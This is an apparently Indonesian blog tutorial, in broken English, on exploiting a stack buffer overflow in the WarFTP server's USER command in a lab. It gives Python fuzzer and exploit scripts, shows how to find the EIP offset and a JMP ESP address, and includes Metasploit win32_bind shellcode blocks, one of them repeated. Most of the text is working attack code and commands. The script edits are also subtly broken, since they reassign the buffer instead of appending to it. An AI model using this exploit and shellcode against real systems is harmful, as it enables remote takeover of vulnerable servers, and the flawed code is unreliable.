To do this Process we use some tools
1. Preparing tools
- Ollybg as Debugger Donwload here
- Fuzzer for do fuzzing process
- Python, which we will to make an application fuzzer and exploit.
2. After Download Ollybg, please install in your XP. you can see how install Ollydb in my lesson before it.
then Download Warftp and install in Windows.
3. Afer install Warftp we can see picture below :
4. Well Follow this ways :D
>>> Fuzzing
on every fase Vulnerability dvelopment, fuzzing process is an early stage.
Ok will create Fuzzer with python language..
Opern Kwrite and follow this script
#!/usr/bin/pyton
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
#buffer="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5$
#buffer="\x41"*1000
nilaiEIP="\x90" * 485
nilaiEIP+="\xEF\xBE\xAD\xDE"
s.connect(('192.168.56.101',21))
data=s.recv(1024)
print("sendingevildatavia USER command..")
s.send('USER '+nilaiEIP+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")
And Save with extension .py for example xfuzz.py
5. ok now run your warftp, for run warftp choose menu Propertis --> Start Service, until status be idle and test connection in konsole with root@bt:~# nc 192.168.56.101 21
21 is PORT of warftp
root@bt:~# python xfuzz.py
when you enter and connection nc stop then warftp on Windows STOP that is application crash when fuzzer try data processing which sending.
7. Now will see what is action in application when we try attack use fuzzer. lets run you Ollydb and open your warftp there. when you run warftp again the application will be error so you much
- Delete file FTPdaemon.DAT
- Run again the application WarFTP server
- Create User dummies trough the user's security
and run again look at picture below :
--> Run Warftp and start service
then open Ollydb choose File + attack + warftp + attack + start
Cek root@bt:~# nc 192.168.56 101 21
8. Run
root@bt:~# python xfuzz.py
look at result on ollydb
with use Olldb we can see action on register WarFTP server, now we can ssee 4 registers available on Warftp existing data which send by fuzzer, there are :
ESP, EDI, EBP, EIP
the four registers existing value 0x41 which if changed into ASCII be letter A.
----> on normal situation
~Register ESP save data variable local in the application.
~WarFtp save data which input via User's command
~then EIP will execution, next command from warftp, that is direct command into address
memory application where from by it there are function to checking users input.
~memory's address from function will execution the input. checking that user's input there
are on the sistem.
----> On Bufferflow's situation
~Register ESP filled with data from fuzzer, because data is over finally overwrite regsiter's address ESP, that is data AAAA or 0x1414141
~Register ESP overwrite from data, make the system send data to next register in memory, that is registers EBP, which an action is same like ESP.
~after register EBP overwrite, next data overwrite next register that is register EIP, and in this situation the program be crash. Operation system will try search the address which destination by register EIP that is AAA atau 0x1414141, which the data from 1000 byte character A result of generate from fuzzer application.
On this situation make an attacker have opportunity to control the register EIP to their needed.
Now we must know on how many bytes to accumulate the data register that was sent by fuzzer.
we will using Exploit Metasploit Framework .
one of tolls of metasploit which use is pattern_create. why we using pattern_create ?
"to find the actual location of a legendary string of the packet data transmitted by thefuzzer to the application".
9. root@bt:/pentest/exploits/framework/tools#
for result data such as 1000 byte, run command
root@bt:/pentest/exploits/framework/tools# ./pattern_create.rb 1000 > string_pattern.txt
to see using kwrite
after create sting_pattern, now put into the string pattern on the application fuzzer.
after that you can run again warftp using ollydb and result
attention the values in the ESP and the EIP register. The second register is a registerwhich is very vital. ESP register is vital because when one attacker knows the address where the stack, allowing it to himself to save the payload code (bakcdoor,virus, trojan etc.) into the stack, and then executed by the system via the addressstored in the EIP. because the space available on a large enough stack, making it possible to store the application code to the application for the VNC client.
after successfully making crash the application using an existing data pattern, the next step to look at how the string byte overwrite the existing registers. to do so, wewill use a second tool, the pattern_offset.
10. pattern Offset
functions of this application is to calculate the amount of bytes from the set patterngenerated by the application pattern_create.db. this application These applications are stored in the same folder with pattern_create.db.
./pattern_offset.rb 32714131
result 485
./pattern_offset.rb q4Aq5Aq
result 493
seen that, to achieve the required EIP registers for data and 485 bytes of data are needed to reach the stack of 493 bytes. from here in the know that would happenoverwrite EIP register as many as 4 byte is the byte to 486, 487, 488, 489. to provethat, the register that was able to overwrite the EIP register at byte to 486, 487, 488 and 489 of the collection of data buffer that is sent through a fuzzer, the next step is tocustomize the application fuzzer by changing the buffer and adds variable EIP value.
run warftp using Ollydb again. and
root@bt:~# python xfuzz.py
#!/usr/bin/pyton
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
#buffer="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5$
#buffer="\x41"*1000
#nilaiEIP="\x90" * 485
#nilaiEIP+="\xEF\xBE\xAD\xDE"
buffer="\x90" * 485
buffer="\xEF\xBE\xAD\xDE"
buffer="\x90" * (493 - len(buffer))
buffer="\xCC" * (1000 - len(buffer))
s.connect(('192.168.56.101',21))
data=s.recv(1024)
#print("sendingevildatavia USER command..")
#s.send('USER '+nilaiEIP+'\r\n')
#data=s.recv(1024)
#s.send('PASS PASSWORD '+'\r\n')
s.send('USER '+buffer+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
#print("Finish")
Run again warftp using Ollydb and after run fuzzer.. look at result
the next thing we'll do is find out the address in the memory WarFTP applicationserver that performs the reading into the Stack. EIP can not be executed because the address stack, then use "stepping stone" to be able to get into the stack.
12. JMP ESP
Because EIP can't do direct access to buffer memory, then we will make Register ESP because ESP can do direct access in to buffer memory.
Register EIP -----> memory address there are command JMP ESP ----> Register ESP ----> Buffer (stack) -----> mengeksekusi PAYLOAD.
For search JMP ESP in memory application .. follow some steps below :
1. Run the application using Ollydb. on menu view choose sub menu Executale modules
4. after determine library, double click the file and then will show window new CPU from file library.
5. Next step is search JMP ESP in the file.
right click on menu ------> Search FOr ----> COmmand and will show
6. Input JMP ESP in command and press push find
7. we can see that Ollydb Success Find JMP ESP.
attention in the election should not be any memory address containing indigo \ x00, \X0A, and \ x0d. because it would mess up the payload.
8. trying JMP ESP
change value 7C9D30D7 be \xD7 \x30 \x9D \x7C on your script fuzzer.
9. Run again WarFTP using Ollydb
and
root@bt:~# python xfuzz.py
10. Open Metasploit for create PAYLOAD
----> root@bt:/pentest/exploits/framework2# ./msfweb
---> Open Browser
127.0.01:55555/payloads. Choses PAYLOADS
127.0.01:55555/payloads. Choses PAYLOADS
/* win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=ShikataGaNai http://metasploit.com */
unsigned char scode[] =
"\xd9\xc2\xd9\x74\x24\xf4\x31\xc9\xbe\x15\xfb\xf1\x70\xb1\x51\x5b"
"\x83\xc3\x04\x31\x73\x13\x03\x66\xe8\x13\x85\x74\x64\x3f\x2b\x6c"
"\x80\x40\x4b\x93\x13\x34\xd8\x4f\xf0\xc1\x64\xb3\x73\xa9\x63\xb3"
"\x82\xbd\xe7\x0c\x9d\xca\xa7\xb2\x9c\x27\x1e\x39\xaa\x3c\xa0\xd3"
"\xe2\x82\x3a\x87\x81\xc3\x49\xd0\x48\x09\xbc\xdf\x88\x65\x4b\xe4"
"\x58\x5e\x9c\x6f\x84\x15\x83\xab\x47\xc1\x5a\x38\x4b\x5e\x28\x61"
"\x48\x61\xc5\x9e\x5c\xea\x90\xcc\xb8\xf0\xc3\xcf\xf0\xd3\x60\x44"
"\xb1\xd3\xe3\x1a\x3a\x9f\x84\x86\xef\x14\x24\xbe\xb1\x42\x2b\xf0"
"\x43\x7f\x63\xf3\x8a\x19\xd7\x6d\x5b\xd5\xe5\x19\xec\x6a\x38\x86"
"\x46\x72\xec\x50\xac\x61\xf1\x9b\x62\x85\xdc\x84\x0b\x9c\x87\xbb"
"\xe1\x57\x4a\xee\x93\x65\xb5\xc0\x0c\xb3\x40\x15\x61\x14\xac\x03"
"\x29\xc8\x01\xf8\x9d\xad\xf6\xbd\x72\xcd\x29\x27\x1d\x20\x96\xc1"
"\x8e\xcb\xc7\x98\x59\x68\x1d\xd2\x5e\x27\xdd\xc4\x0b\xd8\x70\xbd"
"\x34\x08\x1a\x99\x66\x87\x32\xb6\x87\x0e\x97\x6d\x87\x7f\x70\x68"
"\x3e\x06\xc8\x25\x3e\xd0\x9b\x9d\x94\x88\xe4\xcd\x86\x5b\xfc\x94"
"\x6e\xe2\x55\x99\xb9\x40\xa5\xb5\x20\x01\x3d\x53\xc5\xb6\xd0\x12"
"\xf0\x53\x7b\x7d\xd2\x6f\xf2\x9a\x4e\x34\x8c\x86\xbe\x74\x7d\xec"
"\x3f\x36\xaf\x0e\xfd\x9b\x3c\x63\x78\xdc\xe9\xd0\xd6\x74\x9c\xd8"
"\x9a\x93\x9f\x51\x99\x64\x89\xc2\x76\xc9\x67\xa5\x29\x87\x86\x14"
"\x9b\x02\xd8\x69\xcb\xc5\x77\x4c\xe9\xdb\xdb\x91\x24\x89\x24\x92"
"\xfe\xb1\x0b\xe7\x56\xb2\x2f\x33\x3c\xb5\xe6\xe9\x42\x99\x6f\xfd"
"\x37\x1e\x2f\xae\xb8\xc9\x30\x80";
Or
buffer+="\xd9\xc1\x33\xc9\xb1\x51\xbb\x7c\xfd\x24\xb1\xd9\x74\x24\xf4\x5a" buffer+="\x31\x5a\x17\x03\x5a\x17\x83\x96\x01\xc6\x44\x9a\x90\xec\xea\x8a" buffer+="\x9c\x0c\x0b\xb5\x3f\x78\x98\x6d\xe4\xf5\x24\x51\x6f\x75\xa2\xd1" buffer+="\x6e\x69\x27\x6e\x69\xfe\x67\x50\x88\xeb\xd1\x1b\xbe\x60\xe0\xf5" buffer+="\x8e\xb6\x7a\xa5\x75\xf6\x09\xb2\xb4\x3d\xfc\xbd\xf4\x29\x0b\x86" buffer+="\xac\x89\xdc\x8d\xa9\x59\x43\x49\x33\xb5\x1a\x1a\x3f\x02\x68\x43" buffer+="\x5c\x95\x85\x78\x70\x1e\xd0\x12\xac\x3c\x82\x29\x9d\xe7\x20\x26" buffer+="\x9d\x27\x22\x78\x2e\xc3\x44\x64\x83\x58\xe4\x9c\x85\x36\x6b\xd2" buffer+="\x37\x2b\x23\x15\x91\xd5\x97\x8f\x76\x29\x2a\x27\xf0\x3e\x78\xe8" buffer+="\xaa\x3f\xac\x7e\x98\x2d\xb1\x45\x4e\x51\x9c\xe6\xe7\x48\x47\x99" buffer+="\x15\x9a\x8a\xcc\x8f\x99\x75\x3e\x27\x47\x80\x4b\x15\x20\x6c\x65" buffer+="\x35\x9c\xc1\xda\xe9\x61\xb5\x9f\x5e\x99\xe9\x79\x09\x74\x56\xe3" buffer+="\x9a\xff\x87\x7e\x74\xa4\x52\xf0\x42\xf3\x9d\x26\x26\xec\x30\x93" buffer+="\x48\xdc\xdb\xbf\x1a\xf3\xf2\xe8\x9b\xda\x56\x43\x9b\x33\x30\x8e" buffer+="\x2a\x32\x88\x07\x52\xec\x5b\xf3\xf8\x44\xa3\x2b\x93\x0f\xbc\xb2" buffer+="\x52\xb6\x15\xbb\x8d\x1c\x65\x93\x54\xf5\xfd\x75\xf1\x6a\x93\xf0" buffer+="\xe4\x07\x3b\x5b\xce\x1b\x32\xbc\x7a\xe0\xcc\xa0\x4a\x28\x3d\x8e" buffer+="\x53\xea\xef\x30\xe9\xc7\x7c\x41\x94\x2f\x28\xf2\xc2\x38\x5c\xfa" buffer+="\xa6\xaf\x5f\x77\x8d\x30\x49\x2c\x5a\x9d\x27\x83\x35\x4b\xc9\x72" buffer+="\xe7\xde\x98\x8b\xd7\x89\xb7\xaa\xdd\x87\x9b\xb3\x08\x7d\xe3\xb4" buffer+="\x82\x7d\xcb\xc1\xba\x7d\x6f\x11\x20\x81\xa6\xcb\x56\xad\x2f\x1b" buffer+="\x22\x4a\xef\x88\xcc\x85\xf0\xfe";
Or
buffer+="\xd9\xc1\x33\xc9\xb1\x51\xbb\x7c\xfd\x24\xb1\xd9\x74\x24\xf4\x5a" buffer+="\x31\x5a\x17\x03\x5a\x17\x83\x96\x01\xc6\x44\x9a\x90\xec\xea\x8a" buffer+="\x9c\x0c\x0b\xb5\x3f\x78\x98\x6d\xe4\xf5\x24\x51\x6f\x75\xa2\xd1" buffer+="\x6e\x69\x27\x6e\x69\xfe\x67\x50\x88\xeb\xd1\x1b\xbe\x60\xe0\xf5" buffer+="\x8e\xb6\x7a\xa5\x75\xf6\x09\xb2\xb4\x3d\xfc\xbd\xf4\x29\x0b\x86" buffer+="\xac\x89\xdc\x8d\xa9\x59\x43\x49\x33\xb5\x1a\x1a\x3f\x02\x68\x43" buffer+="\x5c\x95\x85\x78\x70\x1e\xd0\x12\xac\x3c\x82\x29\x9d\xe7\x20\x26" buffer+="\x9d\x27\x22\x78\x2e\xc3\x44\x64\x83\x58\xe4\x9c\x85\x36\x6b\xd2" buffer+="\x37\x2b\x23\x15\x91\xd5\x97\x8f\x76\x29\x2a\x27\xf0\x3e\x78\xe8" buffer+="\xaa\x3f\xac\x7e\x98\x2d\xb1\x45\x4e\x51\x9c\xe6\xe7\x48\x47\x99" buffer+="\x15\x9a\x8a\xcc\x8f\x99\x75\x3e\x27\x47\x80\x4b\x15\x20\x6c\x65" buffer+="\x35\x9c\xc1\xda\xe9\x61\xb5\x9f\x5e\x99\xe9\x79\x09\x74\x56\xe3" buffer+="\x9a\xff\x87\x7e\x74\xa4\x52\xf0\x42\xf3\x9d\x26\x26\xec\x30\x93" buffer+="\x48\xdc\xdb\xbf\x1a\xf3\xf2\xe8\x9b\xda\x56\x43\x9b\x33\x30\x8e" buffer+="\x2a\x32\x88\x07\x52\xec\x5b\xf3\xf8\x44\xa3\x2b\x93\x0f\xbc\xb2" buffer+="\x52\xb6\x15\xbb\x8d\x1c\x65\x93\x54\xf5\xfd\x75\xf1\x6a\x93\xf0" buffer+="\xe4\x07\x3b\x5b\xce\x1b\x32\xbc\x7a\xe0\xcc\xa0\x4a\x28\x3d\x8e" buffer+="\x53\xea\xef\x30\xe9\xc7\x7c\x41\x94\x2f\x28\xf2\xc2\x38\x5c\xfa" buffer+="\xa6\xaf\x5f\x77\x8d\x30\x49\x2c\x5a\x9d\x27\x83\x35\x4b\xc9\x72" buffer+="\xe7\xde\x98\x8b\xd7\x89\xb7\xaa\xdd\x87\x9b\xb3\x08\x7d\xe3\xb4" buffer+="\x82\x7d\xcb\xc1\xba\x7d\x6f\x11\x20\x81\xa6\xcb\x56\xad\x2f\x1b" buffer+="\x22\x4a\xef\x88\xcc\x85\xf0\xfe";
edit configurasi script fuzzer :
after that run Warftp using Ollydb and fuzzer
then
run WarFtp using Ollydb and Run
root@bt:~# telnet 192.168.56.101 444
attention "If You do'nt success with Your PAYLOADS, you can try another PAYLOAD "
Refresh your PAYLOADS and you will get new PAYLOADS in your metasploit.
GOOD LUCK
Tidak ada komentar:
Posting Komentar